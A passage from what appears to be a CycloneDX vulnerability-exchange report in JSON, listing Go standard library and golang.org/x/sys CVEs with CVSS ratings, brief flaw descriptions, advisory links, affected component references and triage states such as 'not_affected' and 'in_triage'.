      "recommendation": "Upgrade golang.org/x/sys to version 0.44.0",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-39824"
        },
        {
          "url": "https://go.dev/cl/770080"
        },
        {
          "url": "https://go.dev/issue/78916"
        },
        {
          "url": "https://groups.google.com/g/golang-announce/c/6MMI8Lj-Atg"
        },
        {
          "url": "https://pkg.go.dev/vuln/GO-2026-5024"
        }
      ],
      "published": "2026-05-22T20:16:33+00:00",
      "updated": "2026-07-23T16:10:00+00:00",
      "affects": [
        {
          "ref": "pkg:golang/golang.org/x/sys@v0.7.0",
          "versions": [
            {
              "version": "v0.7.0",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:golang/golang.org/x/sys@v0.7.0"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-46600",
      "source": {
        "name": "govulndb",
        "url": "https://pkg.go.dev/vuln/"
      },
      "ratings": [
        {
          "source": {
            "name": "bitnami"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        }
      ],
      "cwes": [
        125
      ],
      "description": "Parsing an invalid SVCB or HTTPS RR can panic when the size of a parameter value overflows the message buffer.",
      "recommendation": "Upgrade stdlib to version 1.26.6, 1.27.0-rc.3",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-46600"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-46600"
        },
        {
          "url": "https://go.dev/cl/786345"
        },
        {
          "url": "https://go.dev/issue/79795"
        },
        {
          "url": "https://groups.google.com/g/golang-announce/c/94pEornpRlI"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-46600"
        },
        {
          "url": "https://pkg.go.dev/vuln/GO-2026-5942"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-46600"
        }
      ],
      "published": "2026-07-21T20:17:01+00:00",
      "updated": "2026-08-14T16:16:55+00:00",
      "affects": [
        {
          "ref": "pkg:golang/stdlib@v1.26.5",
          "versions": [
            {
              "version": "v1.26.5",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:golang/stdlib@v1.26.5"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#c59bd67f-00ce-4797-a91c-6d4ff9417f79"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#cc905330-a0b5-4fda-a146-bfc61b975282"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#c0ee620e-0d44-421b-94c0-80424dc2f306"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#f5d36586-7474-4ab2-a672-7d613fb5bffe"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#364133d9-ec3a-4026-b5d5-b726139ca458"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#62a28906-1968-4f06-a6e9-e1e760e08077"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#fd3ac5da-4130-48e7-b65a-daf1e6fce61f"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#a72eb2de-9501-4c75-b3b6-da1149109181"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#c662774d-1e8b-4f4b-9358-27562de2262d"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#ed91413a-eaa2-4aef-886a-56aa02da233d"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#e8501d1b-4e18-43af-a2b8-228a6470aa23"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#afcc76dd-9513-4721-8d6c-cc704207bdaa"
        }
      ],
      "analysis": {
        "state": "in_triage",
        "justification": "",
        "response": [],
        "detail": "This CVE is under investigation by Confluent."
      }
    },
    {
      "id": "CVE-2026-56853",
      "source": {
        "name": "govulndb",
        "url": "https://pkg.go.dev/vuln/"
      },
      "ratings": [
        {
          "source": {
            "name": "bitnami"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        }
      ],
      "cwes": [
        770
      ],
      "description": "When a server is configured to support unencrypted HTTP/2, it reads a few bytes from each new connection to see if they contain the HTTP/2 client preface. ReadHeaderTimeout is unexpectedly not being applied when doing this.",
      "recommendation": "Upgrade stdlib to version 1.25.13, 1.26.6, 1.27.0-rc.3",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-56853"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-56853"
        },
        {
          "url": "https://go.dev/cl/795540"
        },
        {
          "url": "https://go.dev/issue/80205"
        },
        {
          "url": "https://groups.google.com/g/golang-announce/c/94pEornpRlI"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-56853"
        },
        {
          "url": "https://pkg.go.dev/vuln/GO-2026-6089"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-56853"
        }
      ],
      "published": "2026-08-13T22:17:22+00:00",
      "updated": "2026-08-14T16:16:57+00:00",
      "affects": [
        {
          "ref": "pkg:golang/stdlib@v1.26.5",
          "versions": [
            {
              "version": "v1.26.5",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:golang/stdlib@v1.26.5"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#c59bd67f-00ce-4797-a91c-6d4ff9417f79"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#cc905330-a0b5-4fda-a146-bfc61b975282"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#c0ee620e-0d44-421b-94c0-80424dc2f306"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#f5d36586-7474-4ab2-a672-7d613fb5bffe"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#364133d9-ec3a-4026-b5d5-b726139ca458"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#62a28906-1968-4f06-a6e9-e1e760e08077"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#fd3ac5da-4130-48e7-b65a-daf1e6fce61f"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#a72eb2de-9501-4c75-b3b6-da1149109181"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#c662774d-1e8b-4f4b-9358-27562de2262d"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#ed91413a-eaa2-4aef-886a-56aa02da233d"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#e8501d1b-4e18-43af-a2b8-228a6470aa23"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#afcc76dd-9513-4721-8d6c-cc704207bdaa"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-56858",
      "source": {
        "name": "govulndb",
        "url": "https://pkg.go.dev/vuln/"
      },
      "ratings": [
        {
          "source": {
            "name": "bitnami"
          },
          "score": 6.1,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 8.1,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N"
        }
      ],
      "cwes": [
        79
      ],
      "description": "Previously, pathological inputs could close an unescaped '/' early, allowing for attack-controlled data to inject arbitrary content, potentially leading to XSS.",
      "recommendation": "Upgrade stdlib to version 1.25.13, 1.26.6, 1.27.0-rc.3",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-56858"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-56858"
        },
        {
          "url": "https://go.dev/cl/807100"
        },
        {
          "url": "https://go.dev/issue/80435"
        },
        {
          "url": "https://groups.google.com/g/golang-announce/c/94pEornpRlI"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-56858"
        },
        {
          "url": "https://pkg.go.dev/vuln/GO-2026-6091"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-56858"
        }
      ],
      "published": "2026-08-13T22:17:22+00:00",
      "updated": "2026-08-14T16:16:57+00:00",
      "affects": [
        {
          "ref": "pkg:golang/stdlib@v1.26.5",
          "versions": [
            {
              "version": "v1.26.5",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:golang/stdlib@v1.26.5"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#c59bd67f-00ce-4797-a91c-6d4ff9417f79"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#cc905330-a0b5-4fda-a146-bfc61b975282"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#c0ee620e-0d44-421b-94c0-80424dc2f306"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#f5d36586-7474-4ab2-a672-7d613fb5bffe"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#364133d9-ec3a-4026-b5d5-b726139ca458"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#62a28906-1968-4f06-a6e9-e1e760e08077"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#fd3ac5da-4130-48e7-b65a-daf1e6fce61f"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#a72eb2de-9501-4c75-b3b6-da1149109181"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#c662774d-1e8b-4f4b-9358-27562de2262d"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#ed91413a-eaa2-4aef-886a-56aa02da233d"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#e8501d1b-4e18-43af-a2b8-228a6470aa23"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#afcc76dd-9513-4721-8d6c-cc704207bdaa"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-56859",
      "source": {
        "name": "govulndb",
        "url": "https://pkg.go.dev/vuln/"
      },
      "ratings": [
        {
          "source": {
            "name": "bitnami"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        }
      ],
      "cwes": [
        770
      ],
      "description": "Previously, DecodeElement would reset the depth counter causing it to never fire; this could lead to stack exhaustion.",
      "recommendation": "Upgrade stdlib to version 1.25.13, 1.26.6, 1.27.0-rc.3",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-56859"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-56859"
        },
        {
          "url": "https://go.dev/cl/803320"
        },
        {
          "url": "https://go.dev/issue/80481"
        },
        {
          "url": "https://groups.google.com/g/golang-announce/c/94pEornpRlI"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-56859"
        },
        {
          "url": "https://pkg.go.dev/vuln/GO-2026-6088"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-56859"
        }
      ],
      "published": "2026-08-13T22:17:22+00:00",
      "updated": "2026-08-14T16:16:57+00:00",
      "affects": [
        {
          "ref": "pkg:golang/stdlib@v1.26.5",
          "versions": [
            {
              "version": "v1.26.5",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:golang/stdlib@v1.26.5"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#c59bd67f-00ce-4797-a91c-6d4ff9417f79"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#cc905330-a0b5-4fda-a146-bfc61b975282"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#c0ee620e-0d44-421b-94c0-80424dc2f306"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#f5d36586-7474-4ab2-a672-7d613fb5bffe"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#364133d9-ec3a-4026-b5d5-b726139ca458"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#62a28906-1968-4f06-a6e9-e1e760e08077"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#fd3ac5da-4130-48e7-b65a-daf1e6fce61f"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#a72eb2de-9501-4c75-b3b6-da1149109181"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#c662774d-1e8b-4f4b-9358-27562de2262d"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#ed91413a-eaa2-4aef-886a-56aa02da233d"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#e8501d1b-4e18-43af-a2b8-228a6470aa23"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#afcc76dd-9513-4721-8d6c-cc704207bdaa"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-56860",
      "source": {
        "name": "govulndb",
        "url": "https://pkg.go.dev/vuln/"
      },
      "ratings": [
        {
          "source": {
            "name": "bitnami"
          },
          "score": 5.9,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        }
      ],
      "cwes": [
        407
      ],
      "description": "Previously, resolving relative paths containing parent directory ('..') segments performed string conversions and buffer rewrites on each step, resulting in quadratic time complexity and high memory allocation overhead. Now, path resolution operates on a byte buffer using index-based backtracking for '..' segments, eliminating the quadratic time complexity and significantly reducing memory allocations.",
      "recommendation": "Upgrade stdlib to version 1.25.13, 1.26.6, 1.27.0-rc.3",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-56860"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-56860"
        },
        {
          "url": "https://go.dev/cl/803681"
        },
        {
          "url": "https://go.dev/issue/80494"
        },
        {
          "url": "https://groups.google.com/g/golang-announce/c/94pEornpRlI"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-56860"
        },
        {
          "url": "https://pkg.go.dev/vuln/GO-2026-6218"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-56860"
        }
      ],
      "published": "2026-08-13T22:17:22+00:00",
      "updated": "2026-08-14T17:19:13+00:00",
      "affects": [
        {
          "ref": "pkg:golang/stdlib@v1.26.5",
          "versions": [
            {
              "version": "v1.26.5",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:golang/stdlib@v1.26.5"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#c59bd67f-00ce-4797-a91c-6d4ff9417f79"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#cc905330-a0b5-4fda-a146-bfc61b975282"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#c0ee620e-0d44-421b-94c0-80424dc2f306"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#f5d36586-7474-4ab2-a672-7d613fb5bffe"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#364133d9-ec3a-4026-b5d5-b726139ca458"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#62a28906-1968-4f06-a6e9-e1e760e08077"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#fd3ac5da-4130-48e7-b65a-daf1e6fce61f"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#a72eb2de-9501-4c75-b3b6-da1149109181"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#c662774d-1e8b-4f4b-9358-27562de2262d"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#ed91413a-eaa2-4aef-886a-56aa02da233d"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#e8501d1b-4e18-43af-a2b8-228a6470aa23"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#afcc76dd-9513-4721-8d6c-cc704207bdaa"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-56862",
      "source": {
        "name": "govulndb",
        "url": "https://pkg.go.dev/vuln/"
      },
      "ratings": [
        {
          "source": {
            "name": "bitnami"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        }
      ],
      "cwes": [
        770
      ],
      "description": "Handshake messages, such as KeyUpdate, are always considered as state-advancing, regardless of whether a handshake has been completed or not. As a result, a malicious client can keep sending KeyUpdate messages to force the server to keep performing key derivation operations indefinitely.",
      "recommendation": "Upgrade stdlib to version 1.25.13, 1.26.6, 1.27.0-rc.3",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-56862"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-56862"
        },
        {
          "url": "https://go.dev/cl/804261"
        },
        {
          "url": "https://go.dev/issue/80528"
        },
        {
          "url": "https://groups.google.com/g/golang-announce/c/94pEornpRlI"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-56862"
        },
        {
          "url": "https://pkg.go.dev/vuln/GO-2026-6090"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-56862"
        }
      ],
      "published": "2026-08-13T22:17:22+00:00",
      "updated": "2026-08-14T16:16:57+00:00",
      "affects": [
        {
          "ref": "pkg:golang/stdlib@v1.26.5",
          "versions": [
            {
              "version": "v1.26.5",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:golang/stdlib@v1.26.5"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#c59bd67f-00ce-4797-a91c-6d4ff9417f79"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#cc905330-a0b5-4fda-a146-bfc61b975282"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#c0ee620e-0d44-421b-94c0-80424dc2f306"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#f5d36586-7474-4ab2-a672-7d613fb5bffe"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#364133d9-ec3a-4026-b5d5-b726139ca458"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#62a28906-1968-4f06-a6e9-e1e760e08077"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#fd3ac5da-4130-48e7-b65a-daf1e6fce61f"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#a72eb2de-9501-4c75-b3b6-da1149109181"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#c662774d-1e8b-4f4b-9358-27562de2262d"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#ed91413a-eaa2-4aef-886a-56aa02da233d"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#e8501d1b-4e18-43af-a2b8-228a6470aa23"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#afcc76dd-9513-4721-8d6c-cc704207bdaa"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    }
  ]
}